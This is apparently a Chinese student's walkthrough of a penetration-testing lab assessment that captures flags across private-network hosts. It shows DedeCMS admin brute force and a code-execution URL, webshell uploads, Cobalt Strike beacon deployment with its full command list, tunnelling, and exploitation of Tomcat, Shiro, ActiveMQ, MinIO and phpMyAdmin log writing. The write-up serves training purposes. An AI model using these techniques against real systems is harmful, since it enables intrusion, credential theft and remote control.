云曦渗透考核复现
信息收集
nmap 172.16.17.0/24
172.16.17.177
织梦cms5.7的漏洞网上一抓一大把
后台登录http://172.16.17.177/dede/login.php
爆破得到admin/1q2w3e4r
成功以管理员身份进入后台管理界面
看到flag2就在头上了
flag2
当时我是依靠任意文件上传来getshell 的
后来看到还有另外一个方法
代码执行漏洞
织梦cms5.7 后台存在代码执行漏洞_织梦cms漏洞-CSDN博客
访问 /dede/tpl.php?action=upload
查看源代码
我们可以发现token
token:令牌,暗号,在一些数据传输之前,要先进行暗号的核对,不同的暗号被授权不同的数据操作。说白了token是一个身份卡,有权限的作用。
接着访问
http://172.16.17.177/dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=356588231a8777b2001ecdd1b568373a
http://172.16.17.177/include/taglib/moonsec.lib.php
发现写入成功
任意文件上传漏洞
在index.php有文件时管理器
使用一下哥斯拉把
先生成一个a.php
然后在根目录上传了
目标--添加
连接成功
可以发现数据库文件
织梦mysql连接_dedecms数据库连接-CSDN博客
$cfg_dbhost是本地连接
$cfg_dbname是数据库名
$cfg_dbuser是数据库用户名
$cfg_dbpwd是数据库密码
$cfg_dbprefix是数据表前缀
$cfg_db_language是数据库编码
我们连接一下 dbinfoconfig
在dede库的dede_admin表中有flag1
flag1
在命令终端 我们可以直接创建一个新用户
111/Wy123789
光顾着连数据库了
没想到文件里面有flag3
flag3
cs
以管理员身份运行cmd
一开始一直不能切换到cs的目录下
参考Windows管理员权限打开cmd使用cd切换路径失败_cmd的cd命令进不了路径_紫午的博客-CSDN博客
cd /d E:\渗透\cs\CobaltStrike4.5
teamserver.bat 172.16.17.77 123456
双击
端口在上面有
密码123456
进了
生成监听
生成payload
选择exe
选择监听器为上面新增配置的监听器 wy
通过哥斯拉上传这个exe文件
然后在命令终端执行一下
可以看到Cobalt Strike 客户端出现了目标主机的信息
右击
1.在 Cobalt Strike 中,默认心跳为 60s(即 CS 与受害机默认 60s 才进行一次交互),故执行命令的响应速度很慢,在下载文件时更加明显,所以根据实战环境把时间降低,建议不要太快,否则流量会相对明显。在这里执行命令 sleep 5 可以把交互时间设置为 5 秒。
2.在 beacon 中,如果想对目标进行命令管理,需要在前面加上shell关键词,如shell whoami、shell ipconfig等。
help 命令即可参看各项命令说明
Beacon Commands
===============
Command Description
------- -----------
argue 进程参数欺骗
blockdlls 在子进程中阻止非Microsoft的DLLs文件
browserpivot 注入受害者浏览器进程
bypassuac 绕过UAC
cancel 取消正在进行的下载
cd 切换目录
checkin 强制让被控端回连一次
clear 清除beacon内部的任务队列
connect 通过TCP连接到Beacon
covert 部署Covert VPN客户端
cp 复制文件
dcsync 从DC中提取密码哈希
desktop 远程VNC
dllinject 反射DLL注入进程
dllload 使用LoadLibrary将DLL加载到进程中
download 下载文件
downloads 列出正在进行的文件下载
drives 列出目标盘符
elevate 尝试提权
execute 在目标上执行程序(无输出)
execute-assembly 在目标上内存中执行本地.NET程序
exit 退出beacon
getprivs 对当前令牌启用系统权限
getsystem 尝试获取SYSTEM权限
getuid 获取用户ID
hashdump 转储密码哈希值
help 帮助
inject 在特定进程中生成会话
jobkill 杀死一个后台任务
jobs 列出后台任务
kerberos_ccache_use 从ccache文件中导入票据应用于此会话
kerberos_ticket_purge 清除当前会话的票据
kerberos_ticket_use 从ticket文件中导入票据应用于此会话
keylogger 键盘记录
kill 结束进程
link 通过命名管道连接到Beacon
logonpasswords 使用mimikatz转储凭据和哈希值
ls 列出文件
make_token 创建令牌以传递凭据
mimikatz 运行mimikatz
mkdir 创建一个目录
mode dns 使用DNS A作为通信通道(仅限DNS beacon)
mode dns-txt 使用DNS TXT作为通信通道(仅限D beacon)
mode dns6 使用DNS AAAA作为通信通道(仅限DNS beacon)
mode http 使用HTTP作为通信通道
mv 移动文件
net net命令
note 给当前目标机器备注
portscan 进行端口扫描
powerpick 通过Unmanaged PowerShell执行命令
powershell 通过powershell.exe执行命令
powershell-import 导入powershell脚本
ppid 为生成的post-ex任务设置父PID
ps 显示进程列表
psexec 使用服务在主机上生成会话
psexec_psh 使用PowerShell在主机上生成会话
psinject 在特定进程中执行PowerShell命令
pth 使用Mimikatz进行传递哈希
pwd 当前目录位置
reg 查询注册表
rev2self 恢复原始令牌
rm 删除文件或文件夹
rportfwd 端口转发
run 在目标上执行程序(返回输出)
runas 以另一个用户权限执行程序
runasadmin 在高权限下执行程序
runu 在另一个PID下执行程序
screenshot 屏幕截图
setenv 设置环境变量
shell cmd执行命令
shinject 将shellcode注入进程
shspawn 生成进程并将shellcode注入其中
sleep 设置睡眠延迟时间
socks 启动SOCKS4代理
socks stop 停止SOCKS4
spawn 生成一个会话
spawnas 以其他用户身份生成会话
spawnto 将可执行程序注入进程
spawnu 在另一个PID下生成会话
ssh 使用ssh连接远程主机
ssh-key 使用密钥连接远程主机
steal_token 从进程中窃取令牌
timestomp 将一个文件时间戳应用到另一个文件
unlink 断开与Beacon的连接
upload 上传文件
wdigest 使用mimikatz转储明文凭据
winrm 使用WinRM在主机上生成会话
wmi 使用WMI在主机上生成会话
net view 查看局域网主机
抓取明文密码
Cobaltstrike内网渗透神器入门使用教程_coblatstrike如何切换账户_Tr0e的博客-CSDN博客
查看密码凭证
查看目标列表
永恒之蓝
因为看到445端口开放,试试看永恒之蓝
失败了
192.168.31.30
新建监听器
横向监听
选择监听器与会话
开启会话交互 ipconfig
文件浏览
右键下载
在下载列表里面下载到本地,
flag4
192.168.31.131:80
在cs上开启sock4代理
proxy配置sock4代理
进入
参考
tomcat文件写入漏洞
【Tomcat-8.5.19】文件写入漏洞_apache tomcat/8.5.19_夭-夜的博客-CSDN博客
因为bp不能进行sock4代理
只有sock5
所以用neo开启代理
python neoreg.py -k a -u http://172.16.17.177/tunnel.php
在bp配置代理
开启代理
抓包
修改为put方式传参
http://192.168.31.131/3.jsp?cmd=ls
flag11
命令执行
cat /flag
192.168.31.131:8080
remember me 非常明显是shiro框架了
之前师兄讲了考核之前还看了觉得会考可惜没扫到
shiro框架漏洞
使用工具
爆破密钥
命令执行
flag10
192.168.31.131:8161
admin/admin 登录
登录成功
ActiveMQ 任意文件写入漏洞(CVE-2016-3088)复现_cve-2016-3088 poc-CSDN博客
activemq文件写入漏洞
需要管理员权限,访问http://192.168.31.131:8161/admin/test/systemProperties.jsp
上传webshell
移动到web目录下的api文件夹(/opt/activemq/webapps/api/shell.jsp)中
命令执行
flag9
192.168.31.131:9001
直接搜minio漏洞
minio信息泄露漏洞
CVE-2023-28432:MinIO信息泄露漏洞-腾讯云开发者社区-腾讯云
用户名密码都知道了,登录
在文件夹里面找到flag.png
好的虚晃一枪
在hehe文件夹里面
flag12
172.16.17.134
dirsearch扫描
http://172.16.17.134/phpmyadmin/
弱口令漏洞
root/root
wydl
居然在右边就直接有flag7
flag7
flag 5
phpmyadmin日志写马
我们访问一下172.16.17.134/l.php
php探针
在这里我们可以看到网站的绝对路径
看到这个版本我直接去搜了一下phpstudy探针2014漏洞
没想到真的有
但是没有时间打了这里先不写
等会写
查看日志是否开启
SHOW VARIABLES LIKE '%general%'
开启日志记录
SET GLOBAL general_log='on';修改日志路径
set global general_log_file='C:/phpstudy_pro/WWW/a.php';
写入shell
select "";
访问一下,我们已经getshell了
拿蚁剑连接
可以创建用户 111/Wy123789
我们还可以找到flag6
flag6
当时是师兄把源码down下来了
但是我只在里面找到了flag7.。。
好的后来发现flag8也在这个里面
flag8
信息泄露漏洞
扫出/phpinfo.php
蚁剑发现网站根目录下有yxcms
访问看看
yxcms
记录一次模拟内网渗透(一)_yxcms_Spritε的博客-CSDN博客
离谱了我说,密码就在公告里面
进去之后,搜了半天,flag居然在右上角
yxcms后台任意文件读写漏洞
点击“前台模板”后 ,再点击“管理模板文件”,“新建”
提示:
拿御剑扫描
下载,看default的路径
蚁剑getshell
flag找完了没有了